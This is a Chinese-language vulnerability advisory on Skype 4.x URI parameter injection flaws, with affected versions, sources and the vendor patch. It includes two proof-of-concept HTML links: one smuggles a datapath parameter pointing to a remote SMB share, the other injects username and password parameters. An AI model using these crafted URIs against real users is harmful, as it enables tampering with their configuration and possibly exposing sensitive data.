Skype URI参数处理多个安全漏洞

受影响系统:

Skype Skype 4.x

不受影响系统:

Skype Skype 4.2.0.155

描述:


BUGTRAQ  ID: 38699

Skype是一款流行的P2P VoIP软件,可提供高质量的语音通讯服务。

Skype在处理URI中的参数串时存在输入验证漏洞,远程攻击者可能利用此漏洞修改用户的配置或访问某些敏感信息。

URI中可能包含的/Datapath参数可以指向恶意的SMB共享,攻击者可以通过诱使用户点击恶意的skype: URI来利用漏洞。

此外Skype在处理skype-plugin:协议时也没有正确的过滤恶意URI参数,用户跟随恶意链接就可能导致删除任意指定的XML文件。

<*来源:Paul Craig
  
  链接:http://secunia.com/advisories/38908/
        http://secunia.com/advisories/38875/
        http://marc.info/?l=bugtraq&m=126832796811895&w=2
        http://marc.info/?l=bugtraq&m=126843238916086&w=2
        http://marc.info/?l=bugtraq&m=126843306616880&w=2
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<a href=skype:A"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>Click Me</a>
<a href=skype:A"0x01/secondary0x01/username:"test”0x01/password:”test>Click Me</a>

建议:


厂商补丁:

Skype
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://developer.skype.com/WindowsSkype/ReleaseNotes
http://share.skype.com/sites/garage/2010/03/10/ReleaseNotes_4.2.0.155.pdf

发表评论?

0 条评论。

发表评论